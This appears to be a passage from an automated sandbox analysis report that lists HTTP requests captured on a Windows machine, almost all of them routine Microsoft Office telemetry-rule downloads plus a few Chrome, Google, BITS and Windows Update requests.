                      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EnPNfHXroMtz3vU&MD=Ptzta2Fs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
